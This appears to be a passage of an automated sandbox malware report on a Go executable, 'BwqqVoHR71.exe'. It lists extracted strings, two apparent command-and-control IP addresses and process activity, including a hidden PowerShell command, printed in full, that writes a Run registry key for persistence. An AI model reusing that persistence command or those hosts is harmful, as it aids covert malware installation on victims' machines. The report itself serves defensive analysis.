    Source: BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://91.212.166.91
    Source: BitLockerToGo.exe, 00000005.00000002.3048724976.000000000BD46000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://93.185.159.253
    Source: BwqqVoHR71.exeString found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
    Source: BwqqVoHR71.exeString found in binary or memory: http://cevcsca2021.ocsp-certum.com07
    Source: BwqqVoHR71.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
    Source: BwqqVoHR71.exeString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
    Source: BwqqVoHR71.exeString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
    Source: powershell.exe, 00000006.00000002.2006769465.00000000073AB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
    Source: powershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
    Source: BwqqVoHR71.exeString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
    Source: BwqqVoHR71.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr606
    Source: powershell.exe, 00000006.00000002.2002646379.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2006421841.0000000007310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
    Source: BwqqVoHR71.exeString found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
    Source: BwqqVoHR71.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
    Source: powershell.exe, 00000006.00000002.2002646379.0000000004B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: BwqqVoHR71.exeString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
    Source: BwqqVoHR71.exeString found in binary or memory: http://subca.ocsp-certum.com02
    Source: powershell.exe, 00000006.00000002.2002646379.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2006421841.0000000007310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
    Source: BwqqVoHR71.exeString found in binary or memory: http://www.certum.pl/CPS0
    Source: powershell.exe, 00000006.00000002.2002646379.0000000004B21000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBfq
    Source: powershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
    Source: powershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
    Source: powershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
    Source: powershell.exe, 00000006.00000002.2002646379.0000000004C76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2006421841.0000000007310000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
    Source: powershell.exe, 00000006.00000002.2004954961.0000000005B89000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
    Source: BwqqVoHR71.exeString found in binary or memory: https://picsum.photos/208/500
    Source: BwqqVoHR71.exeString found in binary or memory: https://picsum.photos/500/500%02x:%02x:%02x:%02x:%02x:%02x
    Source: BwqqVoHR71.exeString found in binary or memory: https://www.certum.pl/CPS0
    Source: BwqqVoHR71.exeString found in binary or memory: https://www.globalsign.com/repository/0
    Source: BwqqVoHR71.exe, 00000000.00000002.1992782995.0000000000D1E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: directInput8Creatememstr_d4ab7c7d-1
    Source: BwqqVoHR71.exe, 00000000.00000002.1992782995.000000000171E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: github.com/hajimehoshi/ebiten/v2/internal/glfw._GetRawInputDatamemstr_c3e7c151-8
    Source: BwqqVoHR71.exeStatic PE information: invalid certificate
    Source: BwqqVoHR71.exeStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
    Source: BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000002CCC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs BwqqVoHR71.exe
    Source: BwqqVoHR71.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: BwqqVoHR71.exe, 00000000.00000002.1996663271.00000000040F2000.00000004.00001000.00020000.00000000.sdmp, BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000002D08000.00000004.00001000.00020000.00000000.sdmp, BwqqVoHR71.exe, 00000000.00000002.1996663271.00000000050A6000.00000004.00001000.00020000.00000000.sdmp, BwqqVoHR71.exe, 00000000.00000002.1996663271.0000000004AC3000.00000004.00001000.00020000.00000000.sdmp, BitLockerToGo.exe, 00000005.00000002.3047534110.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: .vbpb
    Source: classification engineClassification label: mal84.troj.evad.winEXE@7/3@0/5
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile created: C:\Users\user\AppData\Local\configJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dkt2sm3n.qgx.ps1Jump to behavior
    Source: BwqqVoHR71.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: BwqqVoHR71.exeReversingLabs: Detection: 28%
    Source: BwqqVoHR71.exeString found in binary or memory: , locked to threadruntime.semacreateruntime.semawakeupunexpected newlinevalue out of range298023223876953125Nashville-DavidsonDominican RepublicKorea, Republic ofRussian FederationFyodor DogstoevskyPrince of BarknessAmerican ShorthairEuropean ShorthairOriental ShorthairScottish DeerhoundNorwegian ElkhoundMiniature PinscherAustralian TerrierBedlington TerrierPatterdale TerrierDouble Bastard AleOrval Trappist Ale1098 - British Ale5733 - PediococcusBelgian Strong AleGulliver's TravelsMemoirs of HadrianPippi LongstockingCrossfire RoadsterGrand Cherokee 2wdGrand Cherokee 4wdTown & Country 2wdE150 Econoline 2wdFreestar Wagon FwdMonterey Wagon FwdTaurus Ethanol FfvC1500 Suburban 2wdX-type Sport BrakeL-140/715 GallardoClk350 (cabriolet)F150 Supercrew 4wdSylvester StalloneScarlett JohanssonMadam C. J. WalkerMarco Pierre WhiteArianna HuffingtonSir Donald BradmanMichael SchumacherSir Steve RedgraveHicham El GuerroujBerkshire HathawayCastle BiosciencesDocket Alarm, Inc.Forrester ResearchHarris CorporationHealthPocket, Inc.iFactor ConsultingInfoCommerce GroupMarinexplore, Inc.National Van LinesThe Vanguard GroupUrban Mapping, IncWay Better PatentsFully-configurableReverse-engineeredcontextually-basedlocal area networkMauritania OuguiyaMozambique MeticalNew Zealand DollarSaudi Arabia RiyalSaint Helena PoundSierra Leone LeoneTurkmenistan ManatYekaterinburg Time(UTC-10:00) Hawaii(UTC-09:00) Alaska(UTC-04:00) Cuiaba(UTC-01:00) Azores(UTC+02:00) Beirut(UTC+03:30) Tehran(UTC+06:00) Astana(UTC+08:00) Taipei(UTC+09:30) Darwin(UTC+10:00) HobartAfrica/Addis_AbabaAfrica/BrazzavilleAfrica/OuagadougouAmerica/Costa_RicaAmerica/Fort_WayneAmerica/Grand_TurkAmerica/GuadeloupeAmerica/HermosilloAmerica/KralendijkAmerica/LouisvilleAmerica/MartiniqueAmerica/MetlakatlaAmerica/MontevideoAmerica/MontserratAmerica/ParamariboAmerica/Porto_AcreAmerica/Rio_BrancoAmerica/St_VincentAmerica/WhitehorseAntarctica/McMurdoAntarctica/RotheraAsia/SrednekolymskAsia/Ujung_PandangAsia/YekaterinburgAtlantic/Jan_MayenAtlantic/ReykjavikAtlantic/St_HelenaAustralia/AdelaideAustralia/BrisbaneAustralia/CanberraAustralia/LindemanEurope/Isle_of_ManEurope/KaliningradPacific/Kiritimati
    Source: BwqqVoHR71.exeString found in binary or memory: buttonraised_hand_with_fingers_splayedapplication/x-pkcs7-certificatesapplication/vnd.ms-pki.certstorenats cucumber cream cheese bagelawesome orange chocolate muffinstuna red onion and parsley saladtomato cucumber avocado sandwichsimple pan fried chicken breastsroasted potatoes and green beansgolden five spice sticky chickenroasted cherry or grape tomatoescrushed red potatoes with garlicoriental asparagus and mushroomschocolate macadamia nut browniescream cheese walnut drop cookiesangelic strawberry frozen yogurtfew sandwiches short of a picnicmonkeys might fly out of my buttplease excuse my dear Aunt Sallybefore you can say Jack Robinsonin literal false (expecting 'a')in literal false (expecting 'l')in literal false (expecting 's')in literal false (expecting 'e')reflect: NumIn of non-func type reflect.MapOf: invalid key type MapIter.Value called before Nextreflect.Value.Grow: negative lentotal sampling factors too largeunescaped < inside quoted stringbootstrap type already present: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurex509: unknown SignatureAlgorithminteger is not minimally encodedcannot represent time as UTCTimeber2der: BER tag length too longpkcs7: No certificate for signerbufio: invalid use of UnreadBytebufio: invalid use of UnreadRunebufio: tried to fill full buffermime: expected token after slashgo package net: hostLookupOrder(use of closed network connectionGetVolumePathNamesForVolumeNameWreflect: NumOut of non-func type" not supported for cpu option "glfw: CreateWindowExW failed: %wglfw: GetRawInputData failed: %wglfw: TrackMouseEvent failed: %wthe requested API is unavailabletoo many arguments in call to %sconstant %s truncated to integerinit function is not implementedinvalid arguments for bool: (%s)invalid arguments for vec2: (%s)invalid arguments for vec3: (%s)invalid arguments for vec4: (%s)invalid arguments for mat2: (%s)invalid arguments for mat3: (%s)invalid arguments for mat4: (%s)UnknownBoolStringIntFloatComplexinvalid size %d (should be >= 0)expected end of string, found %qmalformed character constant: %scrypto/ecdh: invalid private keyed25519: bad public key length: crypto/des: input not full blockunexpected character, want colonwhile parsing a block collectiondid not find expected ',' or ']'did not find expected ',' or '}'found incompatible YAML documentincomplete UTF-16 surrogate pairwhile scanning a %YAML directivedid not find expected whitespacemultiple ,inline maps in struct nil type in named parameter listreadPythonMultilines: parsing %qValue %d for key %s out of rangedate time should have a timezonecouldn't parse binary number: %winput overflows the modulus sizeexpected: IDENT | STRING got: %sunimplemented Value for type: %sbasic string not terminated by "unexpected null character (0x00)Specific brand or variety of beerThe specific name given to a bookA problem with a web http requestHex or RGB arr
    Source: BwqqVoHR71.exeString found in binary or memory: buttonraised_hand_with_fingers_splayedapplication/x-pkcs7-certificatesapplication/vnd.ms-pki.certstorenats cucumber cream cheese bagelawesome orange chocolate muffinstuna red onion and parsley saladtomato cucumber avocado sandwichsimple pan fried chicken breastsroasted potatoes and green beansgolden five spice sticky chickenroasted cherry or grape tomatoescrushed red potatoes with garlicoriental asparagus and mushroomschocolate macadamia nut browniescream cheese walnut drop cookiesangelic strawberry frozen yogurtfew sandwiches short of a picnicmonkeys might fly out of my buttplease excuse my dear Aunt Sallybefore you can say Jack Robinsonin literal false (expecting 'a')in literal false (expecting 'l')in literal false (expecting 's')in literal false (expecting 'e')reflect: NumIn of non-func type reflect.MapOf: invalid key type MapIter.Value called before Nextreflect.Value.Grow: negative lentotal sampling factors too largeunescaped < inside quoted stringbootstrap type already present: x509: unsupported elliptic curvex509: invalid constraint value: x509: malformed subjectPublicKeyx509: cannot parse rfc822Name %qx509: ECDSA verification failurex509: unknown SignatureAlgorithminteger is not minimally encodedcannot represent time as UTCTimeber2der: BER tag length too longpkcs7: No certificate for signerbufio: invalid use of UnreadBytebufio: invalid use of UnreadRunebufio: tried to fill full buffermime: expected token after slashgo package net: hostLookupOrder(use of closed network connectionGetVolumePathNamesForVolumeNameWreflect: NumOut of non-func type" not supported for cpu option "glfw: CreateWindowExW failed: %wglfw: GetRawInputData failed: %wglfw: TrackMouseEvent failed: %wthe requested API is unavailabletoo many arguments in call to %sconstant %s truncated to integerinit function is not implementedinvalid arguments for bool: (%s)invalid arguments for vec2: (%s)invalid arguments for vec3: (%s)invalid arguments for vec4: (%s)invalid arguments for mat2: (%s)invalid arguments for mat3: (%s)invalid arguments for mat4: (%s)UnknownBoolStringIntFloatComplexinvalid size %d (should be >= 0)expected end of string, found %qmalformed character constant: %scrypto/ecdh: invalid private keyed25519: bad public key length: crypto/des: input not full blockunexpected character, want colonwhile parsing a block collectiondid not find expected ',' or ']'did not find expected ',' or '}'found incompatible YAML documentincomplete UTF-16 surrogate pairwhile scanning a %YAML directivedid not find expected whitespacemultiple ,inline maps in struct nil type in named parameter listreadPythonMultilines: parsing %qValue %d for key %s out of rangedate time should have a timezonecouldn't parse binary number: %winput overflows the modulus sizeexpected: IDENT | STRING got: %sunimplemented Value for type: %sbasic string not terminated by "unexpected null character (0x00)Specific brand or variety of beerThe specific name given to a bookA problem with a web http requestHex or RGB arr
    Source: BwqqVoHR71.exeString found in binary or memory: x509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativegzip: invalid compression level: %dgzip.Write: Extra data is too largemime: bogus characters after %%: %qSubscribeServiceChangeNotificationsfile type does not support deadlinezlib: invalid compression level: %dglfw: AdjustWindowRectEx failed: %wglfw: CreateIconIndirect failed: %wglfw: GetModuleHandleExW failed: %wthe GLFW library is not initializedinvalid argument for enum parameterthe requested format is unavailablethe specified window has no contextglfw: invalid input mode 0x%08X: %wglfw: invalid window size %dx%d: %wglfw: invalid window opacity %f: %wopengl: unexpected attribute layoutno new variables on left side of :='_' must separate successive digitshash/crc32: invalid hash state sizerange can only initialize variablestransform: short destination bufferbigmod: modulus is smaller than natflate: corrupt input before offset too many Questions to pack (>65535)must set the input source only oncedid not find expected '-' indicatorfound extremely long version numberfound unexpected document indicatormethod must have no type parameters%s: unknown kind to decode into: %s%s: not an object type for map (%T)nanoseconds need at least one digitnumber cannot start with underscoretoml: cannot encode a nil interfaceshould not be called with empty keynumber %f does not fit in a float32P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitybasic strings cannot have new linesunimplemented HCLToken for type: %sTime.UnmarshalBinary: invalid lengthAffectionate nickname given to a petAnimal name commonly found on a farmMeasures the alcohol content in beerABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789Blueberry banana happy face pancakes590c1440-9888-45b0-bd51-a817ee07c3f2?????@??????.com => billy@mister.comInterpret context record river mind.Cannot set children on terminal nodeThunk Address Of Data too spread outPower PC with floating point supportCherokee United States (chr-Cher-US)Chinese (Traditional) Taiwan (zh-TW)English United Arab Emirates (en-AE)locale not found when calling %s: %vcrypto/cipher: input not full blocksbytes: Repeat output length overflowbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionaccessing a corrupted shared libraryfailure to read data directories: %vfail to read section relocations: %vfail to read string table length: %vstrings.Builder.Grow: negative countstrings: Join output length overflowlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closi
    Source: BwqqVoHR71.exeString found in binary or memory: x509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativegzip: invalid compression level: %dgzip.Write: Extra data is too largemime: bogus characters after %%: %qSubscribeServiceChangeNotificationsfile type does not support deadlinezlib: invalid compression level: %dglfw: AdjustWindowRectEx failed: %wglfw: CreateIconIndirect failed: %wglfw: GetModuleHandleExW failed: %wthe GLFW library is not initializedinvalid argument for enum parameterthe requested format is unavailablethe specified window has no contextglfw: invalid input mode 0x%08X: %wglfw: invalid window size %dx%d: %wglfw: invalid window opacity %f: %wopengl: unexpected attribute layoutno new variables on left side of :='_' must separate successive digitshash/crc32: invalid hash state sizerange can only initialize variablestransform: short destination bufferbigmod: modulus is smaller than natflate: corrupt input before offset too many Questions to pack (>65535)must set the input source only oncedid not find expected '-' indicatorfound extremely long version numberfound unexpected document indicatormethod must have no type parameters%s: unknown kind to decode into: %s%s: not an object type for map (%T)nanoseconds need at least one digitnumber cannot start with underscoretoml: cannot encode a nil interfaceshould not be called with empty keynumber %f does not fit in a float32P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitybasic strings cannot have new linesunimplemented HCLToken for type: %sTime.UnmarshalBinary: invalid lengthAffectionate nickname given to a petAnimal name commonly found on a farmMeasures the alcohol content in beerABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789Blueberry banana happy face pancakes590c1440-9888-45b0-bd51-a817ee07c3f2?????@??????.com => billy@mister.comInterpret context record river mind.Cannot set children on terminal nodeThunk Address Of Data too spread outPower PC with floating point supportCherokee United States (chr-Cher-US)Chinese (Traditional) Taiwan (zh-TW)English United Arab Emirates (en-AE)locale not found when calling %s: %vcrypto/cipher: input not full blocksbytes: Repeat output length overflowbytes.Reader.ReadAt: negative offsetbytes.Reader.Seek: negative positionaccessing a corrupted shared libraryfailure to read data directories: %vfail to read section relocations: %vfail to read string table length: %vstrings.Builder.Grow: negative countstrings: Join output length overflowlfstack node allocated from the heap) is larger than maximum page size (key size not a multiple of key alignruntime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closi
    Source: BwqqVoHR71.exeString found in binary or memory: buttonflag: British Indian Ocean Territorysouth_georgia_south_sandwich_islandsfailed to {hackerverb} {errorobject}variable assigned before declarationapplication/x-vnd.audioexplosion.mzzmelt in your mouth blueberry muffinssausage gravy for biscuits and gravyblueberry banana happy face pancakesbaby greens with mustard vinaigrettedon t burn your fingers garlic breadsalata marouli romaine lettuce saladlindas chunky garlic mashed potatoespan broiled steak with whiskey sauceyou kiss your mother with that mouthstick that in your pipe and smoke itjson: encoding error for type %q: %qmethod ABI and value ABI don't alignreflect.Value.Equal: values of type exceeded maximum template depth (%v)%s is not a method but has argumentswrong number of args: got %d want %dinternal error: associate not commonhttp://www.w3.org/XML/1998/namespacexml: end tag </%s> without start tagxml: %s chain not valid with %s flagx509: zero or negative DSA parameterx509: invalid CRL distribution pointx509: invalid subject key identifierx509: malformed algorithm identifierIA5String contains invalid characterinvalid boolean value %q for -%s: %vreflect: NumField of non-struct typeglfw: EnumDisplayMonitors failed: %wglfw: invalid cursor mode 0x%08X: %wglobal variables must be exposed: %sunexpected count of types in lhs: %dinvalid number of arguments for vec2invalid number of arguments for vec3invalid number of arguments for vec4invalid number of arguments for mat2invalid number of arguments for mat3invalid number of arguments for mat4multiplication of zero with infinityinvalid semicolon separator in queryno assembly implementation availablecrypto/sha1: invalid hash state sizecrypto/sha512: invalid hash functioncompressed name in SRV resource datamust set the output target only onceunknown problem parsing YAML contentdocument contains excessive aliasingdid not find expected <stream-start>did not find expected version numberinvalid pattern syntax (+ after -): %s: cannot decode into interface: %Ttoml: cannot encode value of type %sedwards25519: invalid point encodingrange length is larger than capacityinvalid characters in heredoc anchortimezone hour outside of range [0,23]invalid type, must be array or object%s field could not parse to int valueDelimited separated unsigned integersWhether or not to have gaps in numberDay of the week excluding the weekendString Representation of a month nameReportAttemptingFullContext decision=French Principality Of Monaco (fr-MC)Inuktitut (Latin) Canada (iu-Latn-CA)Mongolian (Cyrillic) Mongolia (mn-MN)Uzbek (Latin) Uzbekistan (uz-Latn-UZ)Yi People's Republic Of China (ii-CN)` VirtualAddress is beyond 0x10000000cipher: message authentication failedcrypto/cipher: invalid buffer overlapcrypto/cipher: incorrect GCM tag sizebytes.Buffer: truncation out of rangecannot exec a shared library directlyvalue too large for defined data typetoo many symbols; file may be corruptruntime: allocation size out of range) is smaller than minimum page size (/cpu/classes/gc/ma
    Source: BwqqVoHR71.exeString found in binary or memory: span set block with unpopped elements found in resetruntime: GetQueuedCompletionStatusEx failed (errno= casfrom_Gscanstatus: gp->status is not in scan stategamepad: IDirectInputDevice8::EnumObjects failed: %wgamepad: IDirectInputDevice8::GetProperty failed: %wgamepad: IDirectInputDevice8::SetProperty failed: %wUnited Kingdom of Great Britain and Northern Irelandscrambled egg sandwiches with onions and red peppersbaked ham glazed with pineapple and chipotle pepperswrong number of args for %s: want at least %d got %dxml: EncodeElement of StartElement with missing namex509: cannot verify signature: insecure algorithm %vpkcs7: cannot parse data: unimplemented content typepkcs7: encryption algorithm parameters are incorrectpkcs7: encryption algorithm parameters are malformedConvertSecurityDescriptorToStringSecurityDescriptorWConvertStringSecurityDescriptorToSecurityDescriptorWglfw: invalid parameter at Monitor.setVideoModeWin32math/big: cannot unmarshal %q into a *big.Float (%v)crypto/rsa: PSSOptions.SaltLength cannot be negativeinternal error: missing handler for resolver table: unexpected character 'i' while scanning for a numberunexpected character 'n' while scanning for a numberFirst meal of the day, typically eaten in the morningFixed width rows of output data based on input fields<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 Adverb that specifies the exact time an action occursAdverb that gives a general or unspecified time framePronoun referring back to the subject of the sentenceStatement formulated to inquire or seek clarificationCentral Atlas Tamazight (Arabic) Morocco (tzm-ArabMA)non-concurrent sweep failed to drain all sweep queuescompileCallback: argument size is larger than uintptrsync/atomic: compare and swap of nil value into Valuegraphics: fragment shader entry point '%s' is missingapplication/x-nokia-9000-communicator-add-on-softwarekittencals banana almond muffins with almond streuselreflect: non-interface type passed to Type.Implementsreflect.Value.Slice: string slice index out of boundsxml: %s.MarshalXML wrote invalid XML: <%s> not closedx509: certificate specifies an incompatible key usagebufio.Scan: too many empty tokens without progressingpacking: maxSize must be a positive power of 2 but %dshader: at most one //kage:unit can exist in a shadercannot use type %s as type %s in variable declarationmath/big: internal error: cannot find (D/n) = -1 for crypto/ecdh: internal error: mismatched isLess inputscrypto/elliptic: attempted operation on invalid point^[-+]?(\.[0-9]+|[0-9]+(\.[0-9]*)?)([eE][-+]?[0-9]+)?$did not find expected alphabetic or numeric characterType of animal, such as mammals, birds, reptiles, etc.Person or group creating and developing an applicationScale indicating the concentration of extract in wortsSix-digit code representing a color in the color modelDesignated official name of a business or organizationcall to Fake method did not return an unsigned integerWord that modifies verbs, adjectives, or other ad
    Source: BwqqVoHR71.exeString found in binary or memory: net/addrselect.go
    Source: BwqqVoHR71.exeString found in binary or memory: github.com/brianvoe/gofakeit/v6@v6.28.0/data/address.go
    Source: BwqqVoHR71.exeString found in binary or memory: github.com/brianvoe/gofakeit/v6@v6.28.0/address.go
    Source: BwqqVoHR71.exeString found in binary or memory: github.com/magiconair/properties@v1.8.6/load.go
    Source: BwqqVoHR71.exeString found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
    Source: unknownProcess created: C:\Users\user\Desktop\BwqqVoHR71.exe "C:\Users\user\Desktop\BwqqVoHR71.exe"
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: unknownProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeProcess created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"Jump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "if (-Not (Test-Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\App\")) { Set-ItemProperty -Path \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" -Name \"App\" -Value \"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe\" }"Jump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: d3dcompiler_47.dllJump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Users\user\Desktop\BwqqVoHR71.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: winmm.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: powrprof.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: umpdc.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeSection loaded: uxtheme.dllJump to behavior
